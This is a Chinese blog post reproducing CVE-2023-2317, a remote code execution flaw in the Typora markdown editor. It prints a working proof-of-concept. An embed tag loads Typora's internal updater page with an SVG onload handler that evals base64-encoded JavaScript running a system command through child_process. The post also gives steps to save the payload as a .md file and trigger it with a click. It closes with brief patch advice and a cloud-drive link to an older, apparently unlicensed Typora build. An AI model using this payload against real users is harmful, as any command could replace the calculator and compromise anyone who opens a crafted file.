【漏洞复现】Typora远程代码执行漏洞CVE-2023-2317

1.漏洞介绍

Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以通过加载定制的markdown文件实现任意javascript代码执行。

2.影响版本

Typora < 1.6.7

 3.漏洞复现

我使用的Typora版本是1.5.10,未激活,文章下面有作者使用的Typora工具分享

然后在渗透安全团队拿来POC

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
 
Base64解码:reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

1.新建一个txt文件写入POC,再将后缀名改为.md格式

2.用Typora打开车模照片.md文件,进入后点击一下鼠标左键即可触发代码执行,打开计算器

4.修改建议: 

目前厂商已发布升级补丁以修复漏洞

防止钓鱼,不看不用md文件

5.工具获取

Typora1.5.10版本夸克网盘链接
链接:https://pan.quark.cn/s/4f8ebd30d5c0
提取码:9pht

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值